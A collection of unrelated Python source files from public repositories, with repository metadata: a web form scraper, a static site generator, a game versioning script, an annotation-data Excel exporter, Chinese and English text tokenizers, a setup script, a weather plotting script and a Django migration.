131
0.667873
263fcc0769a3c20cdf737d2d68c3e4cbb758029b
1,016
py
Python
python/advanced_sw/GITHUB/test2.py
SayanGhoshBDA/code-backup
8b6135facc0e598e9686b2e8eb2d69dd68198b80
[ "MIT" ]
16
2018-11-26T08:39:42.000Z
2019-05-08T10:09:52.000Z
python/advanced_sw/GITHUB/test2.py
SayanGhoshBDA/code-backup
8b6135facc0e598e9686b2e8eb2d69dd68198b80
[ "MIT" ]
8
2020-05-04T06:29:26.000Z
2022-02-12T05:33:16.000Z
python/advanced_sw/GITHUB/test2.py
SayanGhoshBDA/code-backup
8b6135facc0e598e9686b2e8eb2d69dd68198b80
[ "MIT" ]
5
2020-02-11T16:02:21.000Z
2021-02-05T07:48:30.000Z
import urllib.request, urllib.parse, urllib.error from bs4 import BeautifulSoup import ssl import re import sqlite3 import requests import datetime import os import sys import argparse import random import lxml import lxml.html as lh from lxml import etree import wget from io import StringIO, BytesIO from urllib.request import Request, urlopen # Ignore SSL certificate errors ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE def gender_genie(): url = 'http://www.sxceducation.net/BABSC_CIA/CIAMARKS.aspx' form_data = { 'ddlSession':'2017-2018', 'ddlSemester':'Sem - IV', 'ddlStream':'BSC', 'ddlDept':'COMPUTER SCIENCE HONOURS', 'txtRoll':'508', 'submit': 'btnViewCIA' } response = requests.post(url, data=form_data) tree = lh.document_fromstring(response.content) return tree if __name__ == '__main__': lxmlc = gender_genie() print(lxml.html.tostring(lxmlc))
23.090909
63
0.697835
f8c07f61de0f629904e117299d2bfb944d21da47
8,756
py
Python
hausse/hausse.py
andrenasturas/hausse
58e7cb71d5105cf1d6ec7d294e85668855bf8336
[ "MIT" ]
null
null
null
hausse/hausse.py
andrenasturas/hausse
58e7cb71d5105cf1d6ec7d294e85668855bf8336
[ "MIT" ]
1
2021-08-30T21:41:46.000Z
2021-08-30T21:41:46.000Z
hausse/hausse.py
andrenasturas/hausse
58e7cb71d5105cf1d6ec7d294e85668855bf8336
[ "MIT" ]
1
2021-08-31T19:27:32.000Z
2021-08-31T19:27:32.000Z
"""Hausse main module.""" import json import logging import os from importlib import import_module from pathlib import Path from typing import Callable, Iterable, Union import yaml from .lib import Element, Project from .utils import Defaults, Keys, clean_dir class Hausse(Project): """ Hausse ====== A pluggable static project generator. Hausse can build a static project using a customized list of plugins. A Hausse object should be initialized, populated by initialized plugins with `use()` method, then executed with the `build()` method. Note that without any plugins, Hausse will do no more thant copying files from the source directory (`src` by default) to the output directory (`dist` by default). All processing is done by the plugins. Note also that all Hausse's method returns `self`, for convenient methods call chaining. Hausse object represents at any time the state of the project just before the copy to the output directory. Besides the plugins, it contains a list of processed files, global metadata usable by plugins and settings data used by some plugins relying on previous plugins work. This part is inherited from `hausse.lib.Project` parent class. Parameters ---------- base : str Working directory or hausse.json file path. Current folder by default. If None and hausse.json available in current folder, it will be used. elements : List of Element Additional elements to be add to the project metadata : dict Additional metadata to be add to the project settings : dict Additional settings to be add to the project **kwargs : dict Additional settings to be add to the project. Overwrite `settings`. Examples -------- >>> Hausse().build() # Copy the content of `./src` to `./dist` >>> Hausse().use(Markdown()).build() # Parses markdown files from `./src` to HTML files in `./dist`. >>> Hausse("website").use(Markdown()).build() # Same as before, but using `./website/src` and `./website/dist` >>> Hausse("website", metadata={"foo": "bar"}).use(Markdown()).build() # Same as before, but with "foo" metadata accessible everywhere. Attributes ---------- _plugins : List of Plugin Registered plugins that will be called in `build()` method. elements : List of Element Elements (files, mainly) loaded from source to be processed. metadata : dict Global metadata accessible from any Element. settings : dict Technical storage dictionary for plugins interactions. .. note:: Via inherited `Project.__getattr__` method, `metadata` content is also accessible as `Hausse` attributes for convenient usage. """ def __init__( self, base_dir: str = None, elements: list[Element] = None, metadata: dict = None, settings: dict = None, **kwargs, ): # Project init super().__init__(elements, metadata, settings, **kwargs) # Loaded plugins list self._plugins: list[Callable] = list() # Base directory base_path = Path(base_dir) if base_dir else Path(Defaults.BASE) self.settings[Keys.BASE] = ( base_path.parent if base_path.is_file() else base_path ) def source(self, src: str = Defaults.SRC): """Set the source files directory path. *Defaults to `src`*.""" self.settings[Keys.SRC] = Path(src or Defaults.SRC) return self def destination(self, dist: str = Defaults.DIST): """Set the output directory path. *Defaults to `dist`*.""" self.settings[Keys.DIST] = Path(dist or Defaults.DIST) return self def clean(self, clean: bool = Defaults.CLEAN): """Toggle output directory cleaning. False by default.""" self.settings[Keys.CLEAN] = Defaults.CLEAN if clean is None else clean return self def use(self, plugin: Union[Iterable[Callable], Callable]): """Register a plugin or a list of plugins. Each plugin have to be registered into the Hausse project via this method. Plugins are stored and used in order. A plugin can be used multiple time at once if relevent. Note ---- This method actually accepts any callables, not only Plugin objects, in order to allow usage of simple custom-made methods without full Plugin implementation. """ if isinstance(plugin, list): self._plugins += plugin elif callable(plugin): self._plugins.append(plugin) else: raise ValueError(f"{type(plugin)} is not callable nor an iterable") return self def build(self): """Build the project.""" # Saving original working directory owd = os.getcwd() # Set working directory os.chdir(self.settings.get(Keys.BASE, Defaults.BASE)) # Cleaning dist directory if self.settings.get(Keys.CLEAN, Defaults.CLEAN): clean_dir(self.settings.get(Keys.DIST, Defaults.DIST)) # Load all source files if source folder is defined src = self.settings.get(Keys.SRC) if src: self.elements += [ Element(p.relative_to(src), src, self.metadata) for p in src.rglob("*") if p.is_file() ] # Apply all plugins work for plugin in self._plugins: plugin(self) # Saving built files dist = self.settings.get(Keys.DIST) if dist: for document in self.elements: # Arborescence creation document_path = Path(os.path.join(dist, document._path)) document_path.parent.mkdir(parents=True, exist_ok=True) # Saving built file with open(os.path.join(dist, document._path), "w") as file: file.write(str(document)) # Restoring original working directory os.chdir(owd) return self def save(self, file=None, mode=None, hidden: bool = False): """Save the current configuration to a file.""" if file is None: file = Defaults.FILES[0] if hidden and not file.startswith("."): file = "." + file file = Path(self.settings[Keys.BASE] / Path(file)) if not mode: if file.ext in ["yml", "yaml"]: mode = "yaml" else: mode = "json" settings = dict() if str(self.settings[Keys.SRC]) != Defaults.SRC: settings[Keys.SRC] = str(self.settings[Keys.SRC]) if str(self.settings[Keys.DIST]) != Defaults.DIST: settings[Keys.DIST] = str(self.settings[Keys.DIST]) if self.settings[Keys.CLEAN] != Defaults.CLEAN: settings[Keys.CLEAN] = str(self.settings[Keys.CLEAN]) settings[Keys.PLUGINS] = { plugin.__class__.__name__: plugin.save() for plugin in self._plugins } with open(file, "w", encoding="utf-8") as f: if mode == "json": json.dump(settings, f, ensure_ascii=False, indent=4) if mode in ["yaml", "yml"]: yaml.dump(settings, f, allow_unicode=True) def load(self, file=None, mode=None): """Loads a `hausse.json` settings file""" if file is None: for default in Defaults.FILES: if (self.settings[Keys.BASE] / Path(default)).exists(): file = self.settings[Keys.BASE] / Path(default) break file = Path(file) try: with open(file) as settings: if mode == "json" or not mode and file.suffix == ".json": settings = json.load(settings) elif ( mode == "yaml" or mode == "yml" or not mode and file.suffix in [".yml", ".yaml"] ): settings = yaml.load(settings) self.source(settings.get(Keys.SRC)) self.destination(settings.get(Keys.DIST)) self.clean(settings.get(Keys.CLEAN)) plugins = import_module("hausse.plugins") for name, kwargs in settings.get("plugins", []).items(): plugin = getattr(plugins, name) if plugin: self.use(plugin(**kwargs)) except: logging.warn(f"Failed to load {file} settings file.") # Aliases src = source dist = destination dest = destination
32.917293
80
0.592051
e4b5e6e05339b587ceb4e6a6d8384c8ad3b8aba6
866
py
Python
create_game.py
Lyniat/dungeon-hop
e8d19b2c933feb6665935f37f73785626698ea09
[ "MIT" ]
null
null
null
create_game.py
Lyniat/dungeon-hop
e8d19b2c933feb6665935f37f73785626698ea09
[ "MIT" ]
null
null
null
create_game.py
Lyniat/dungeon-hop
e8d19b2c933feb6665935f37f73785626698ea09
[ "MIT" ]
null
null
null
import time import re import os version = time.time() print "actual version will be: "+str(version) lines = [] with open('./main/client/GameInstance.js') as infile: for line in infile: line = re.sub('GAME_VERSION.*,','GAME_VERSION = '+str(version)+',',line) lines.append(line) infile.close() print "new content will be: "+str(lines) with open('./main/client/GameInstance.js', 'w') as outfile: for line in lines: outfile.write(line) outfile.close() lines = [] with open('./server/server.js') as infile: for line in infile: line = re.sub('GAME_VERSION.*,','GAME_VERSION = '+str(version)+',',line) lines.append(line) infile.close() print "new content will be: "+str(lines) with open('./server/server.js', 'w') as outfile: for line in lines: outfile.write(line) outfile.close() os.system('sh ./obfuscate.sh')
21.65
73
0.655889
39afa0f3a2092298267dda406d5fa7530089896a
11,026
py
Python
backend/app/core/export/task_exporter.py
jinnn-dev/patholearn
b4e6a18cfbf963e71640ed6cac3fc3a618a7ae15
[ "MIT" ]
1
2022-02-20T12:45:04.000Z
2022-02-20T12:45:04.000Z
backend/app/core/export/task_exporter.py
JamesNeumann/learning-by-annotations
c2b5e4b653eeb1c973aa5a7dad35ac8be18cb1ad
[ "MIT" ]
21
2021-11-01T10:13:56.000Z
2021-12-02T10:02:13.000Z
backend/app/core/export/task_exporter.py
jinnn-dev/patholearn
b4e6a18cfbf963e71640ed6cac3fc3a618a7ae15
[ "MIT" ]
1
2021-12-16T18:20:55.000Z
2021-12-16T18:20:55.000Z
import re from io import BytesIO from typing import List, Tuple, Type import requests import xlsxwriter from app.core.config import settings from app.crud.crud_base_task import crud_base_task from app.crud.crud_task_group import crud_task_group from app.crud.crud_user import crud_user from app.crud.crud_user_solution import crud_user_solution from app.models.task import Task from app.schemas.base_task import BaseTask, BaseTaskDetail from app.schemas.polygon_data import AnnotationData, AnnotationType from app.schemas.task import TaskType from app.schemas.task_group import TaskGroup from app.schemas.user import User from app.schemas.user_solution import UserSolution from pydantic import BaseModel, parse_obj_as from sqlalchemy.orm import Session from xlsxwriter import Workbook from xlsxwriter.worksheet import Worksheet class TaskPointRow(BaseModel): user_id: int first_name: str middle_name: str last_name: str x: float y: float label: str question: str task_name: str task_group_name: str image: str class TaskExporter: @staticmethod def write_xlsx_header(worksheet: Worksheet, model: Type[BaseModel]) -> None: """ Writes all fields in the given model to the worksheet first row :param worksheet: Worksheet to write to :param model: Model which field represent the column names """ char = "A" for index, field in enumerate(model.__fields__): col = chr(ord(char[0]) + index) + "1" worksheet.write(col, field) @staticmethod def export_point_task_group_as_xlsx(db: Session, task_group: TaskGroup) -> BytesIO: """ Creates worksheet of point user solutions to the given task group :param db: DB-Session :param task_group: The task group to export the points from :return: Bytes representation of the worksheet """ workbook, worksheet, output = TaskExporter.initialize_xlsx_file() TaskExporter.write_xlsx_header(worksheet, TaskPointRow) start_row = 2 for base_task in task_group.tasks: try: image = requests.get( settings.SLIDE_URL + "/slides/" + base_task.slide_id + "/name" ).json()["name"] except Exception as e: print(e) image = {"name": "Not Found"} start_row = TaskExporter.write_rows_for_base_task( db, worksheet, base_task, task_group, image, start_row ) workbook.close() output.seek(0) return output @staticmethod def export_point_base_task_as_xlsx( db: Session, base_task: BaseTaskDetail, task_group=None ) -> BytesIO: """ Creates worksheet of point user solutions to the given base task :param db: DB-Session :param base_task: The base task to export the points from :param task_group: The task group of the base task :return: Bytes representation of the worksheet """ if not task_group: task_group = crud_task_group.get(db, id=base_task.task_group_id) workbook, worksheet, output = TaskExporter.initialize_xlsx_file() try: image = requests.get( settings.SLIDE_URL + "/slides/" + base_task.slide_id + "/name" ).json()["name"] except Exception as e: print(e) image = {"name": "Not Found"} TaskExporter.write_xlsx_header(worksheet, TaskPointRow) start_row = 2 for task in base_task.tasks: user_solutions = crud_user_solution.get_solution_to_task( db, task_id=task.id ) start_row += TaskExporter.write_rows_for_task( db, worksheet, user_solutions, task, base_task, task_group, image, start_row, ) workbook.close() output.seek(0) return output @staticmethod def export_point_task_as_xlsx( db: Session, task: Task, base_task: BaseTask = None, task_group: TaskGroup = None, ) -> BytesIO: """ Creates worksheet of point user solutions to the given task :param db: DB-Session :param task: The task to export the points from :param base_task: The base task of the task :param task_group: The task group of the task :return: Bytes representation of the worksheet """ if not base_task: base_task = crud_base_task.get(db, id=task.base_task_id) if not task_group: task_group = crud_task_group.get(db, id=base_task.task_group_id) try: image = requests.get( settings.SLIDE_URL + "/slides/" + base_task.slide_id + "/name" ).json()["name"] except Exception as e: print(e) image = {"name": "Not Found"} user_solutions = crud_user_solution.get_solution_to_task(db, task_id=task.id) workbook, worksheet, output = TaskExporter.initialize_xlsx_file() TaskExporter.write_xlsx_header(worksheet, TaskPointRow) TaskExporter.write_rows_for_task( db, worksheet, user_solutions, task, base_task, task_group, image, start_row=2, ) workbook.close() output.seek(0) return output @staticmethod def write_rows_for_task( db: Session, worksheet: Worksheet, user_solutions: List[UserSolution], task: Task, base_task: BaseTask, task_group: TaskGroup, image: str, start_row: int, ) -> int: """ Writes one row for each user solution :param db: DB-Session :param worksheet: Worksheet to write to :param user_solutions: User solutions to extract data from :param task: The task of the user solutions :param base_task: The base task of the user solutions :param task_group: The task group of the user solutions :param image: Image path of the task :param start_row: Where to start writing :return: The last row written to """ char = "A" row_num = 0 for user_solution in user_solutions: user = crud_user.get(db, id=user_solution.user_id) user_solution_rows = TaskExporter.get_point_row( user_solution, user, task, base_task, task_group, image ) for index, row in enumerate(user_solution_rows): for col_index, item in enumerate(TaskPointRow.__fields__): json_row = row.dict() worksheet.write( chr(ord(char[0]) + col_index) + str(start_row + row_num), json_row[item], ) row_num += 1 return row_num @staticmethod def write_rows_for_base_task( db: Session, worksheet: Worksheet, base_task: BaseTaskDetail, task_group: TaskGroup, image: str, start_row: int, ) -> int: """ Writes rows for each task in base task :param db: DB-Session :param worksheet: The worksheet to write to :param base_task: The base task to extract data from :param task_group: The task group of the base task :param image: The image of the base task :param start_row: Where to start writing :return: The last row written to """ for task in base_task.tasks: user_solutions = crud_user_solution.get_solution_to_task( db, task_id=task.id ) start_row += TaskExporter.write_rows_for_task( db, worksheet, user_solutions, task, base_task, task_group, image, start_row, ) return start_row @staticmethod def get_point_row( user_solution: UserSolution, user: User, task: Task, base_task: BaseTask, task_group: TaskGroup, image: str, ) -> List[TaskPointRow]: """ Converts each annotation of the given user solution to an object representing a row in the worksheet :param user_solution: User solution that should be converted :param user: User of the user solution :param task: Task of the user solution :param base_task: Base task of the user solution :param task_group: Task group of the user solution :param image: Image of the base task :return: All Row objects """ task_point_rows = [] if ( task.annotation_type == AnnotationType.SOLUTION_POINT and task.task_type != TaskType.IMAGE_SELECT ): parsed_data = parse_obj_as( List[AnnotationData], user_solution.solution_data ) for annotation in parsed_data: label = annotation.name if not annotation.name: found_bracket_text = re.findall("\((.*?)\)", task.task_question) if len(found_bracket_text) > 0: label = found_bracket_text[0] else: label = "" task_point_rows.append( TaskPointRow( user_id=user.id, first_name=user.firstname, middle_name=user.middlename or "", last_name=user.lastname, x=annotation.coord.image[0].x, y=annotation.coord.image[0].y, label=label, question=task.task_question, task_name=base_task.name, task_group_name=task_group.name, image=image, ) ) return task_point_rows @staticmethod def initialize_xlsx_file() -> Tuple[Workbook, Worksheet, BytesIO]: """ Initializes a xlsx workbook, worksheet and Bytes Buffer :return: Initialized workbook, worksheet and bytes buffer """ output = BytesIO() workbook = xlsxwriter.Workbook(output) worksheet = workbook.add_worksheet() return workbook, worksheet, output
33.718654
109
0.565844
39f43e90eba0874a7457724f83dae596172c3560
1,828
py
Python
cart_text_jieba.py
Artemis-ii/LDA
496e43f875ef35084cfb8539ee8bfe4e4fe68fb7
[ "Apache-2.0" ]
null
null
null
cart_text_jieba.py
Artemis-ii/LDA
496e43f875ef35084cfb8539ee8bfe4e4fe68fb7
[ "Apache-2.0" ]
null
null
null
cart_text_jieba.py
Artemis-ii/LDA
496e43f875ef35084cfb8539ee8bfe4e4fe68fb7
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Thu Nov 1 15:41:02 2018 @author: 月神少女 """ import jieba import jieba.analyse import jieba.posseg as pseg import codecs,sys from string import punctuation from text_parse import TEXT_parse if sys.getdefaultencoding() != 'utf-8': reload(sys) sys.setdefaultencoding('utf-8') class CART_text_jieba(): def __init__(self,txt_file,jieba_txt): self.txt_file = txt_file self.jieba_txt = jieba_txt def jieba(self): # 定义要删除的标点等字符 add_punc=',。、【 】 “”:;()《》‘’{}?!⑦()、%^>℃:.”“^-——=&#@¥' all_punc=punctuation+add_punc f=codecs.open(self.txt_file,'r',encoding="utf8") target = codecs.open(self.jieba_txt, 'w',encoding="utf8") print ('open files') line_num=1 line = f.readline() while line: print('---- processing ', line_num, ' article----------------') line_seg = " ".join(jieba.cut(line.replace("\n",""))) # 移除标点等需要删除的符号 testline=line_seg.split(' ') te2=[] for i in testline: te2.append(i) if i in all_punc: te2.remove(i) # 返回的te2是个list,转换为string后少了空格,因此需要再次分词 # 第二次在仅汉字的基础上再次进行分词 line_seg2 = " ".join(jieba.cut(''.join(te2))) target.writelines(line_seg2) line_num = line_num + 1 line = f.readline() f.close() target.close() ''' if __name__=="__main__": dire="datasource/cartdata" txt="data/cart_text.txt" cut_txt = "data/cart_text_cut.txt" stopword = "data/stopword.txt" text = TEXT_parse(directory=dire,txt_file=txt) text.parse() text_jieba = CART_text_jieba(txt_file=txt,jieba_txt=cut_txt) text_jieba.jieba() '''
27.283582
75
0.561269
299a75a96157e3264ce2c4e4173e6515f69546eb
1,927
py
Python
setup.py
magistersart/ZTC_fork
ce72734ea575d9846b5b81f3efbfd14fa1f7e532
[ "PostgreSQL" ]
null
null
null
setup.py
magistersart/ZTC_fork
ce72734ea575d9846b5b81f3efbfd14fa1f7e532
[ "PostgreSQL" ]
null
null
null
setup.py
magistersart/ZTC_fork
ce72734ea575d9846b5b81f3efbfd14fa1f7e532
[ "PostgreSQL" ]
null
null
null
#!/usr/bin/env python """ ZTC setup file Copyright (c) 2009-2012 Vladimir Rusinov <[email protected]> Copyright (c) 2012 Murano Software [http://www.muranosoft.com] """ import glob import sys if sys.version_info > (3, 3): from packaging.core import setup print("Using packaging") else: try: from distutils2.core import setup print("Using distutils2") except ImportError: from distutils.core import setup setup( name='ztc', version='12.04', description='Zabbix Template Collection', author='Vladimir Rusinov', author_email='[email protected]', url='https://bitbucket.org/rvs/ztc/wiki/Home', package_dir={'': 'src'}, packages=[ 'ztc', 'ztc.lib', 'ztc.system', 'ztc.system.vfs', 'ztc.apache', 'ztc.mysql', 'ztc.nginx', 'ztc.vm', 'ztc.pgsql', 'ztc.net', 'ztc.net.icmp', 'ztc.net.http', 'ztc.hw', 'ztc.java', 'ztc.java.tomcat', 'ztc.php', 'ztc.mongo', 'ztc.ldap'], scripts=glob.glob('src/*.py'), data_files=[ ('/etc/zabbix-agent.d/', glob.glob('./conf/zabbix-agent.d/*.conf') + \ glob.glob('./conf/zabbix-agent.d/*.ini')), ('/etc/ztc', glob.glob('./conf/etc/*.conf')), ('/opt/ztc/templates', glob.glob('templates/*.xml')), ('/opt/ztc/doc/', ('README', 'REQUIREMENTS')), ('/opt/ztc/lib/', glob.glob('lib/*.jar')), ('/opt/ztc/contrib/2gis/bin/', glob.glob('contrib/2gis/bin/*')), ('/opt/ztc/contrib/2gis/conf/zabbix-agent.d/', glob.glob('contrib/2gis/conf/zabbix-agent.d/*')), ('/opt/ztc/contrib/2gis/templates/', glob.glob('contrib/2gis/templates/*')), ('/opt/ztc/contrib/2gis/', glob.glob('contrib/2gis/README')), ], )
31.590164
76
0.542813
29ad9532f3d978caebfd889dd1dcd0b381e68ff3
5,720
py
Python
analysis/Plot_by_time.py
MeteorologieHautnah/MeteorologieHautnah
1607c25b85753f31faccfd279abd503b83c1f4ea
[ "MIT" ]
1
2022-02-17T08:24:13.000Z
2022-02-17T08:24:13.000Z
analysis/Plot_by_time.py
MeteorologieHautnah/MeteorologieHautnah
1607c25b85753f31faccfd279abd503b83c1f4ea
[ "MIT" ]
null
null
null
analysis/Plot_by_time.py
MeteorologieHautnah/MeteorologieHautnah
1607c25b85753f31faccfd279abd503b83c1f4ea
[ "MIT" ]
null
null
null
#!/usr/bin/env python # coding: utf-8 # In[5]: index from wetterdienst import Wetterdienst from wetterdienst.provider.dwd.observation import DwdObservationRequest, DwdObservationDataset, DwdObservationPeriod, DwdObservationResolution from datetime import datetime, timedelta import numpy as np import pandas as pd import matplotlib.pyplot as plt import smopy def station_temp(name, start_date, end_date): request = DwdObservationRequest(parameter=[DwdObservationDataset.TEMPERATURE_AIR], resolution=DwdObservationResolution.MINUTE_10, start_date=start_date, end_date=end_date, ).filter_by_name(name=name) df_res = request.values.all().df.dropna() df_Temp=df_res[df_res.parameter=="temperature_air_mean_200"].drop(['dataset', 'parameter', 'quality'], axis=1) df_Temp.rename(columns={'value':'T'}, inplace=True) df_dew=df_res[df_res.parameter=="temperature_dew_point_mean_200"].drop(['station_id', 'dataset', 'parameter', 'quality'], axis=1) df_dew.rename(columns={'value':'Td'}, inplace=True) df_Temp.set_index(pd.DatetimeIndex(df_Temp['date']), inplace=True) df_dew.set_index(pd.DatetimeIndex(df_Temp['date']), inplace=True) df_out=df_Temp.merge(df_dew, how='left', left_index=True, right_index=True) df_out["time"]=pd.to_datetime(df_Temp.date, format="%Y-%m-%d %H:%M:%S%z").dt.tz_localize(None) #df_out["SEC"]=pd.to_timedelta(df_Temp.date).dt.total_seconds() df_out.set_index(df_out["time"], inplace=True) #df_out.drop(["date"], axis=1) #df_out.set_index("time", inplace=True) df_out=df_out.drop(["date_x", "date_y"], axis=1) #df_out.T=df_out.T-273.15 #df_out.Td=df_out.Td-273.15 return df_out # In[17]: Read file station="Leipzig-Holzhausen" #station="Leipzig/Halle" fn = "./processed/2022-05-24_meteotracker.csv" ds = pd.read_csv(fn) #ds=ds[100:-100] ds.time=pd.to_datetime(ds.time, format="%Y-%m-%dT%H:%M:%S.%fZ") ds["hour"]=ds["time"].dt.strftime("%H").astype(int) ds.set_index(pd.DatetimeIndex(ds["time"]), inplace=True) print("Überblick zum Datensatz:") print() print(ds.nunique()) ds_raw=ds ds=ds[ds.speed>10] # eliminiert Messungen bei Stillstand print() print() print("gefiltert nach Geschwindigkeit: ") print() print( ds.nunique()) # In[13]: plot raw map map = smopy.Map((51.294, 12.31, 51.393, 12.42), z=12) map.show_ipython() #%% start_date=datetime.strftime(min(ds.time), format="%Y-%m-%d") end_date=datetime.strftime(max(ds.time)+np.timedelta64(1, 'D'), format="%Y-%m-%d") DWD=station_temp(station, start_date, end_date) # In[19]: add Dataset ax = map.show_mpl(figsize=(15, 12)) x, y = map.to_pixels(ds.lat, ds.lon) ax.set_title("Gemessene Temperaturen am "+start_date+ " in $^\circ C$", fontsize=30) scatter=ax.scatter(x,y, c=ds.air_temperature, cmap="plasma") cbar=plt.colorbar(scatter, ax=ax) # In[19]: Zeitreihe:wann wurde gemessen? ax = map.show_mpl(figsize=(10, 8)) x, y = map.to_pixels(ds.lat, ds.lon) ax.set_title("Messzeiten am "+start_date+" in h", fontsize=20) scatter=ax.scatter(x,y, c=ds.hour, cmap="rainbow") plt.colorbar(scatter, ax=ax) #%% #ds["SOD"]=timedelta.seconds(ds.time-datetime.strptime(start_date, "%Y-%m-%d")) #df_compared=ds.append(Holzhausen, sort=False) df_compared=ds.merge(DWD, how="outer", sort=True, left_index=True, right_index=True) #df_compared["SOD"]=pd.to_timedelta(df_compared.time).dt.total_seconds() df_compared=df_compared.drop(["time_x", "time_y"], axis=1) #df_compared.set_index("SEC", inplace=True) #df_compared.set_index(pd.DatetimeIndex(df_compared['time']), inplace=True) #df_compared=df_compared.drop("date", axis=1) #for col in ["T", "Td"]: # df_compared[col]=pd.to_numeric(df_compared[col], errors='coerce') df_compared["T"]=df_compared["T"]-273.15 df_compared["Td"]=df_compared["Td"]-273.15 df_compared["T"]=df_compared["T"].interpolate(method="time", inplace=False, axis=0) df_compared["Td"]=df_compared["Td"].interpolate(method="time", inplace=False, axis=0) df_compared["T_diff"]=df_compared["air_temperature"]-df_compared["T"] #%% fig, ax=plt.subplots(figsize=(7, 4)) ax.plot(df_compared["air_temperature"], label="T Track") ax.set_xlabel("Zeit") ax.set_ylabel("Temperatur in $^\circ C$") fig.suptitle("Zeitreihe Messfahrten"+ " am "+start_date) #%% fig, ax=plt.subplots(figsize=(7, 4)) ax.plot(df_compared["T"], label="T "+station) fig.suptitle("T "+station+ " am "+start_date) ax.set_xlabel("Zeit") ax.set_ylabel("Temperatur in $^\circ C$") #%% fig, ax=plt.subplots(figsize=(7, 4)) ax.plot(df_compared["T"], label="T "+station) ax.plot(df_compared["air_temperature"], label="T Track") fig.suptitle("Zeitreihe Messfahrten und Tagesgang "+station+ " am "+start_date) ax.set_xlabel("Zeit") ax.set_ylabel("Temperatur in $^\circ C$") ax.legend() #%% fig, ax=plt.subplots(figsize=(7, 4)) ax.plot(df_compared["T"], label="T "+station) ax.plot(df_compared["air_temperature"], label="T Track") fig.suptitle("Zeitreihe Messfahrten und Tagesgang "+station+ " am "+start_date) ax.set_xlabel("Zeit") ax.set_ylabel("Temperatur in $^\circ C$") ax.grid() ax.legend() ax.set_xlim([min(ds.time),max(ds.time) ]) #%% fig, ax=plt.subplots(figsize=(7, 4)) ax.plot(df_compared.T_diff) fig.suptitle("Temperaturdifferenz Messfahrt - "+station) # In[19]: add differential ax = map.show_mpl(figsize=(10, 8)) x, y = map.to_pixels(df_compared.lat, df_compared.lon) ax.set_title("Gemessene Temperaturdifferenzen ggü. "+station+ " am "+start_date, fontsize=20) scatter=ax.scatter(x,y, c=df_compared.T_diff, cmap="seismic", vmin=-5, vmax=5) plt.colorbar(scatter, ax=ax)
27.368421
142
0.697378
8a25f062ae089a9c6e618210f3ca9e6e14cc1ac8
2,318
py
Python
textmining/com/aaron/text_token.py
qsunny/python
ace8c3178a9a9619de2b60ca242c2079dd2f825e
[ "MIT" ]
null
null
null
textmining/com/aaron/text_token.py
qsunny/python
ace8c3178a9a9619de2b60ca242c2079dd2f825e
[ "MIT" ]
2
2021-03-25T22:00:07.000Z
2022-01-20T15:51:48.000Z
textmining/com/aaron/text_token.py
qsunny/python
ace8c3178a9a9619de2b60ca242c2079dd2f825e
[ "MIT" ]
null
null
null
import pandas as pd import numpy as np import nltk import os import nltk.corpus from nltk.tokenize import word_tokenize from nltk.tokenize import sent_tokenize from nltk.probability import FreqDist import matplotlib.pyplot as plt from nltk.corpus import stopwords from nltk.stem import PorterStemmer from nltk.tokenize import sent_tokenize, word_tokenize from nltk.stem.wordnet import WordNetLemmatizer # sample text for performing tokenization def print_text_tokenize(text): # Passing the string text into word tokenize for breaking the sentences token = word_tokenize(text) print(token) return token def print_text_sentence_tokenization(text): sentence_tokenized_text = sent_tokenize(text) print(sentence_tokenized_text) fdist = FreqDist(sentence_tokenized_text) print(fdist) print(fdist.most_common(2)) # fdist.plot(30, cumulative=False) # plt.show() if __name__ == "__main__": text = "In Brazil they drive on the right-hand side of the road. Brazil has a large coastline on the eastern \ side of South America" text = "Download individual packages from http://nltk.org/nltk_data/ (see the “download” links). Unzip them \ to the appropriate subfolder. For example" token = print_text_tokenize(text) tokenized_sent = set(stopwords.words("english")) print(tokenized_sent) filtered_sent = [] for w in tokenized_sent: if w not in tokenized_sent: filtered_sent.append(w) print("Tokenized Sentence:", tokenized_sent) print("Filterd Sentence:", filtered_sent) ps = PorterStemmer() stemmed_words = [] for w in filtered_sent: stemmed_words.append(ps.stem(w)) print("Filtered Sentence:", filtered_sent) print("Stemmed Sentence:", stemmed_words) lem = WordNetLemmatizer() stem = PorterStemmer() word = "flying" print("Lemmatized Word:", lem.lemmatize(word, "v")) print("Stemmed Word:", stem.stem(word)) text = """Hello Mr. Smith, how are you doing today? The weather is great, and city is awesome. The sky is pinkish-blue. You shouldn't eat cardboard""" print_text_sentence_tokenization(text) sent = "Albert Einstein was born in Ulm, Germany in 1879." tokens = nltk.word_tokenize(sent) print(tokens) print(nltk.pos_tag(tokens))
31.324324
114
0.725626
8abb7933cc4ebb9742b25dffa851376252ea1ffd
840
py
Python
gemtown/modelphotos/migrations/0005_auto_20190424_0316.py
doramong0926/gemtown
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
[ "MIT" ]
null
null
null
gemtown/modelphotos/migrations/0005_auto_20190424_0316.py
doramong0926/gemtown
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
[ "MIT" ]
5
2020-09-04T20:13:39.000Z
2022-02-17T22:03:33.000Z
gemtown/modelphotos/migrations/0005_auto_20190424_0316.py
doramong0926/gemtown
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
[ "MIT" ]
null
null
null
# Generated by Django 2.0.13 on 2019-04-23 18:16 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('modelphotos', '0004_auto_20190420_1737'), ] operations = [ migrations.AlterField( model_name='modelphoto', name='confirm_status', field=models.CharField(choices=[('approving', 'APPROVING'), ('ready', 'READY'), ('pendding', 'PENDDING'), ('rejected', 'REJECTED'), ('approved', 'APPROVED'), ('completed', 'COMPLETED')], default='ready', max_length=20), ), migrations.AlterField( model_name='modelphoto', name='photo_type', field=models.CharField(blank=True, choices=[('etc', 'ETC'), ('full', 'FULL'), ('cover', 'COVER'), ('half', 'HALF')], max_length=256), ), ]
35
231
0.590476
0a8f403bda330cd8e652a58480dad635564ba2ba
1,371
py
Python
packages/OpenCV/nodes/OpenCV___TopHat0/widgets/OpenCV___TopHat0___main_widget.py
Shirazbello/Pyscriptining
0f2c80a9bb10477d65966faeccc7783f20385c1b
[ "MIT" ]
null
null
null
packages/OpenCV/nodes/OpenCV___TopHat0/widgets/OpenCV___TopHat0___main_widget.py
Shirazbello/Pyscriptining
0f2c80a9bb10477d65966faeccc7783f20385c1b
[ "MIT" ]
null
null
null
packages/OpenCV/nodes/OpenCV___TopHat0/widgets/OpenCV___TopHat0___main_widget.py
Shirazbello/Pyscriptining
0f2c80a9bb10477d65966faeccc7783f20385c1b
